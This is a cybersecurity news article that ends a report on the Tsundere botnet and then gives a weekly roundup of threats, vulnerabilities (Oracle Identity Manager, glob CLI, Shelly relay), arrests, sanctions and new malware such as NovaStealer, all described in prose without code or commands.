Once the C2 address is retrieved, it checks to ensure it is a valid WebSocket URL, and then proceeds to establish a WebSocket connection with the specific address and receive JavaScript code sent by the server. Kaspersky said it did not observe any follow-up commands from the server during the observation period. “The ability to evaluate code makes the Tsundere bot relatively simple, but it also provides flexibility and dynamism, allowing the botnet administrators to adapt it to a wide range of actions,” Kaspersky said. The botnet operations are facilitated by a control panel that allows logged-in users to build new artifacts using MSI or PowerShell, manage administrative functions, view the number of bots at any given point of time, turn their bots into a proxy for routing malicious traffic, and even browse and purchase botnets via a dedicated marketplace.
Exactly who is behind Tsundere is not known, but the presence of the Russian language in the source code for logging purposes alludes to a threat actor who is Russian-speaking. The activity is assessed to share functional overlaps with a malicious npm campaign documented by Checkmarx, Phylum, and Socket in November 2024. What’s more, the same server has been identified as hosting the C2 panel associated with an information stealer known as 123 Stealer, which is available on a subscription basis for $120 per month. It was first advertised by a threat actor named “koneko” on a dark web forum on June 17, 2025, per Outpost24’s KrakenLabs Team .
Another clue that points to its Russian origins is that the customers are forbidden from using the stealer to target Russia and the Commonwealth of Independent States (CIS) countries. “Violation of this rule will result in the immediate blocking of your account without explanation,” Koneko said in the post at the time. “Infections can occur through MSI and PowerShell files, which provide flexibility in terms of disguising installers, using phishing as a point of entry, or integrating with other attack mechanisms, making it an even more formidable threat,” Kaspersky said. Found this article interesting?
Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.
ThreatsDay Bulletin: 0-Days, LinkedIn Spies, Crypto Crimes, IoT Flaws and New Malware Waves
This week has been crazy in the world of hacking and online security. From Thailand to London to the US, we’ve seen arrests, spies at work, and big power moves online. Hackers are getting caught. Spies are getting better at their jobs.
Even simple things like browser add-ons and smart home gadgets are being used to attack people. Every day, there’s a new story that shows how quickly things are changing in the fight over the internet. Governments are cracking down harder on cybercriminals. Big tech companies are rushing to fix their security.
Researchers keep finding weak spots in apps and devices we use every day. We saw fake job recruiters on LinkedIn spying on people, huge crypto money-laundering cases, and brand-new malware made just to beat Apple’s Mac protections. All these stories remind us: the same tech that makes life better can very easily be turned into a weapon. Here’s a simple look at the biggest cybersecurity news happening right now — from the hidden parts of the dark web to the main battles between countries online.
Chinese operatives mine LinkedIn for political intel MI5 Warns of Chinese Spies Using LinkedIn to Gather Intel on Lawmakers U.K.’s domestic intelligence agency MI5 has warned lawmakers that Chinese spies are actively reaching out to “recruit and cultivate” them with lucrative job offers on LinkedIn via headhunters or cover companies. Chinese nationals are said to be using LinkedIn profiles to conduct outreach at scale, allegedly on behalf of the Chinese Ministry of State Security. “Their aim is to collect information and lay the groundwork for long-term relationships, using professional networking sites, recruitment agents and consultants acting on their behalf,” House of Commons Speaker Sir Lindsay Hoyle said . The activity is assessed to be “targeted and widespread.” Targets included parliamentary staff, economists, think tank consultants, and government officials.
In a statement shared with BBC, a spokesperson for the Chinese embassy in the UK said accusations of espionage were “pure fabrication” and accused the U.K. of a “self-staged charade.” MI5 is not the only intelligence agency to warn about social media’s potential to allow spying. In July, Mike Burgess, the Director-General of Australia’s Security Intelligence Organization (ASIO), said a foreign intelligence agency tried to find info about an Australian military project by cultivating relationships with people who worked on it. EU rewires privacy playbook E.U.
Floats Proposal for GDPR Changes The European Commission unveiled a proposal for major changes to the European Union’s General Data Protection Regulation (GDPR) and AI Act. Under the new “digital omnibus” package, the E.U. aims to simplify the General Data Protection Regulation (GDPR) and “clarify the definition of personal data” to allow companies to lawfully process personal data for AI training without prior consent from users for “legitimate interest” and as long as they do not break any laws. The move has been criticized for pandering to Big Tech’s interests.
It also amends cookie consent rules on websites, allowing users to “indicate their consent with one-click and save their cookie preferences through central settings of preferences in browsers and operating systems” instead of having to confirm their choice on every website they visit. “Taken together, these changes give both state authorities and powerful companies more room to collect and process personal information with limited oversight and reduced transparency,” the European Digital Rights (eDRI) said . “People will lose straightforward safeguards, and minoritised communities will face even higher exposure to profiling, automated decisions and intrusive monitoring.” Austrian privacy non-profit noyb said the changes “are not ‘maintaining the highest level of personal data protection,’ but massively lower protections for Europeans.” Browser add-ons turned into data siphons Malicious Browser Extensions Steal Data Threat actors are leveraging malicious VPN and ad-blocking extensions for Google Chrome and Microsoft Edge browsers to steal sensitive data. The extensions were collectively installed about 31,000 times.
The extensions, once installed, could intercept and redirect every web page visited by users, collect browsing data and a list of installed extensions, modify or disable other proxy or security tools, and route traffic through attacker-controlled servers, LayerX said . The names of some of the extensions are VPN Professional: Free Unlimited VPN Proxy, Free Unlimited VPN, VPN-free.pro - Free Unlimited VPN for Secure Browsing, Ads Blocker - Block All Ads & Protect Privacy, and Ads Cleaner for Facebook. Crypto launderer’s luxury spree unravels California Man Pleads Guilty to Laundering Crypto Stolen in $230M Scam A 45-year-old from Irvine, California, has pleaded guilty to laundering at least $25 million stolen in a massive $230 million cryptocurrency scam . Kunal Mehta (aka “Papa,” “The Accountant,” and “Shrek”) is the eighth defendant to plead guilty for his participation in this scheme following charges brought by the Department of Justice in May 2025.
The scheme used social engineering to steal hundreds of millions of dollars in cryptocurrency from victims throughout the U.S. through elaborate ruses committed online and through spoofed phone numbers between around October 2023 and March 2025, according to the U.S Justice Department. The stolen proceeds were used to purchase luxury goods, rental homes, a team of private security guards, and exotic cars. “Mehta created multiple shell companies in 2024 for the purpose of laundering funds through bank accounts created to give the appearance of legitimacy,” the DoJ said.
“To facilitate crypto-to-wire money laundering services, Mehta received stolen cryptocurrency from the group, which they had already laundered. Mehta then transferred the cryptocurrency to associates who further laundered it through sophisticated blockchain laundering techniques. The stolen funds returned to Mehta’s shell company bank accounts through incoming wire transfers from additional shell companies organized by others throughout the United States.” Mehta also personally delivered cash when requested by the members, while also performing wire transfers and facilitating exotic car purchases in exchange for a 10% fee. Critical Oracle bug opens door to full system takeover Security Flaw in Oracle Identity Manager Cybersecurity researchers have disclosed details of a critical security flaw in the Identity Manager product of Oracle Fusion Middleware ( CVE-2025-61757 , CVSS score: 9.8) that allows an unauthenticated attacker with network access via HTTP to compromise and take control of susceptible systems.
The vulnerability affects versions 12.2.1.4.0 and 14.1.2.1.0. “This pre-authentication RCE we found would also have been able to breach login.us2.oraclecloud.com, as it was running both OAM and OIM,” Searchlight Cyber’s Adam Kues and Shubham Shah said . “The vulnerability our team discovered follows a familiar pattern in Java: filters designed to restrict authentication often contain easy-to-exploit authentication bypass flaws. Logical flaws in how Java interprets request URIs are a gift that continues giving when paired with matrix parameters.” Oracle addressed the vulnerability last month.
Smart relay flaw triggers repeat reboots Security Flaw in Shelly Pro 4PM Smart Relay A critical security flaw in the Shelly Pro 4PM smart relay ( CVE-2025-11243 , CVSS score: 8.3) that an attacker could exploit to cause a device reboot, limiting the ability to detect abnormal power consumption or expose circuits to undesirable safety risks. “Unexpected inputs to multiple JSON-RPC methods on the Shelly Pro 4PM v1.4.4 can exhaust resources and trigger device reboots,” Nozomi Networks said . “While the issue does not enable code execution or data theft, it can be used to systematically cause repeatable outages—impacting automation routines and visibility in both home and building contexts.” Users are advised to update to version 1.6.0 and avoid direct internet exposure. Crypto mixer founders jailed for laundering millions Samourai Wallet Co-Founders Get Multi-Year Prison Term Keonne Rodriguez and William Lonergan Hill, co-founders of the crypto mixing service Samourai Wallet, were sentenced to five and four years in prison, respectively, for their role in facilitating over $237 million in illegal transactions.
Both defendants pleaded guilty to charges of knowingly transmitting criminal proceeds back in August 2025. The defendants, per U.S. prosecutors, designed Samourai around a Bitcoin mixing service known as Whirlpool and Ricochet to conceal the nature of illicit transactions. “Over $237 million of criminal proceeds laundered through Samourai came from, among other things, drug trafficking, darknet marketplaces, cyber-intrusions, frauds, sanctioned jurisdictions, murder-for-hire schemes, and a child pornography website,” the U.S.
Justice Department
said
. glob CLI flaw opens door to code injection
Security Flaw in glob CLI
A security flaw (
CVE-2025-64756
, CVSS score: 7.5) has been identified in glob CLI’s -c/–cmd flag that could result in operating system command injection, leading to remote code execution. “When glob -c
The vulnerability affects Glob versions from 10.2.0 through 11.0.3. It has been patched in versions 10.5.0, 11.1.0, and 12.0.0. According to AISLE, which discovered and reported the flaw along with Gyde04, “you are not affected if you only use glob’s library API (glob(), globSync(), async iterators) without invoking the CLI tool.” Russian cyber operative caught in Phuket Russian Hacker Wanted by U.S. Arrested in Thailand A Russian national alleged to be affiliated with the Void Blizzard (aka Laundry Bear) hacking group has been arrested in Phuket, according to CNN.
Denis Obrezko, 35, was arrested on November 6, 2025, as part of a joint operation between the U.S. Federal Bureau of Investigation (FBI) and Thai officials. He was arrested a week after entering the country on a flight to Phuket. Earlier this May, Microsoft attributed Void Blizzard to espionage operations targeting organizations that are important to Russian government objectives, including those in government, defense, transportation, media, non-governmental organizations (NGOs), and healthcare sectors in Europe and North America, since at least April 2024.
X debuts encrypted messaging with PIN-secured keys X Rolls Out Encrypted Chat X has revealed Chat, an encrypted upgrade to the platform’s direct messaging service with support for video and voice calls, disappearing messages, and file sharing. In an X post, the social media platform said users can block screenshots and get notified of attempts. X first began rolling out encrypted DMs in May 2023 before pausing the feature on May 29, 2025, to make some improvements. “When entering Chat for the first time, a private-public key pair is created specific to each user,” the company said .
“Users are prompted to enter a PIN (which never leaves the device), which is used to keep the private key securely stored on X’s infrastructure. This private key can then be recovered from any device if the user knows the PIN. In addition to the private-public key pairs, there is a per-conversation key that is used to encrypt the content of the messages. The private-public key pairs are used to exchange the conversation key securely between participating users.” Fake Microsoft invites fuel voice-phishing scam Phishing Campaign Uses Entra Guest User Invites for TOAD Attacks A new phishing campaign has been observed weaponizing Microsoft Entra guest user invitations to deceive recipients into making phone calls to attackers posing as Microsoft support.
The malware campaign uses Microsoft Entra tenant invitations sent from the legitimate invites@microsoft[.]com address to bypass email filters and establish trust with targets. Jabber Zeus coder extradited to face U.S. justice Ukrainian Extradited to U.S. Faces Charges in Jabber Zeus Case A Ukrainian national believed to be a developer for the Jabber Zeus cybercrime group has been reportedly extradited from Italy to the U.S.
The man, Yuriy Igorevich Rybtsov, 41, of Donetsk, is alleged to be MrICQ (aka John Doe #3), according to a report from security journalist Brian Krebs. He is accused of handling notifications of newly compromised entities, as well as of laundering the illicit proceeds from the scheme. Another member of the group, Vyacheslav “Tank” Igorevich Penchukov, pleaded guilty to his role in two different malware schemes, Zeus and IcedID, in February 2024. Later that July, he was sentenced to 18 years and ordered to pay more than $73 million in restitution to victims.
Speaking exclusively to the BBC earlier this month, the 39-year-old described himself as a “friendly guy.” At one point, he ditched cybercrime to start a company buying and selling coal, only to be lured back into it due to business troubles and the promise of good money by becoming a ransomware affiliate. In the meantime, he has been making the most of his prison time, getting high-school diplomas and learning French and English. Penchukov also acknowledged that Russian cybercrime groups worked with security services, such as the FSB. “You can’t make friends in cybercrime, because the next day, your friends will be arrested and they will become an informant,” he was quoted as saying.
“Paranoia is a constant friend of hackers.” In a report published this month, Analyst1 researcher Anastasia Sentsova said , “the Russian state has gotten its hands dirty and set up several hacktivist groups to support its war in Ukraine.” Media Land hit with sanctions over ransomware links Russian Bulletproof Hosting Provider Media Land Sanctioned for Ransomware Ties The U.S., the U.K., and Australia have sanctioned Russian bulletproof hosting (BPH) provider Media Land and its executives , including general director Aleksandr Volosovik (aka Yalishanda), for providing services to cybercrime and ransomware groups like Evil Corp, LockBit, Black Basta, BlackSuit, and Play. The U.S. Treasury Department’s Office of Foreign Assets Control (OFAC) has also designated Hypercore Ltd., a front company of Aeza Group LLC (Aeza Group), along with two additional individuals and two entities that have led, materially supported, or acted for Aeza Group, including Maksim Vladimirovich Makarov, Ilya Vladislavovich Zakirov, Smart Digital Ideas DOO, and Datavice MCHJ. “These so-called bulletproof hosting service providers like Media Land provide cybercriminals essential services to aid them in attacking businesses in the United States and in allied countries,” said Under Secretary of the Treasury for Terrorism and Financial Intelligence John K.
Hurley. In tandem, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) issued an alert to help internet service providers and network defenders mitigate the risks posed by BPH providers. “These providers enable malicious activities such as ransomware, phishing, malware delivery, and denial-of-service (DoS) attacks, posing an imminent and significant risk to the resilience and safety of critical systems and services,” CISA said .
Researchers reengineer PoolParty in C# Porting PoolParty from C++ to C# Cybersecurity researchers have released a C# implementation of PoolParty , a collection of process injection techniques that target Windows Thread Pools to evade endpoint detection and response (EDR) systems. PoolParty was first detailed by SafeBreach in late 2023. Its C# implementation, codenamed SharpParty by Trustwave and Stroz Friedberg, enables the PoolParty techniques to be used in tools that leverage inline MSBuild tasks in XML files. New macOS malware hijacks crypto apps New NovaStealer Spotted Cybersecurity researchers have detailed a new macOS stealer malware called NovaStealer that can exfiltrate wallet-related files, collect telemetry data, and replaces legit Ledger/Trezor applications with tampered copies.
“An unknown dropper fetches and runs mdriversinstall.sh, which installs a small scripts orchestrator under ~/.mdrivers and registers a LaunchAgent labeled application.com.artificialintelligence,” a security researcher who goes by the name Bruce said . “This orchestrator pulls additional scripts encoded in b64 from the C2, drops them under ~/.mdrivers/scripts, and runs them in detached screen sessions in the background. It supports updates and handles the restart of responsible screen sessions.” Every week, new online dangers pop up. Real stories show how much our daily lives depend on the internet.
The same apps and tools that make life quicker and easier can also let bad guys in. It’s not just for experts anymore. Anyone who goes online, clicks links, or shares stuff needs to pay attention. Governments try to catch hackers, and experts find secret weak spots.
But one thing is always true: keeping our digital world safe never ends. The best thing we can do is learn from what happens, fix our apps and passwords, and watch out for new tricks. I’ll keep sharing simple updates and closer looks at the big stories about cyber threats, privacy, and staying safe online. Found this article interesting?
Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.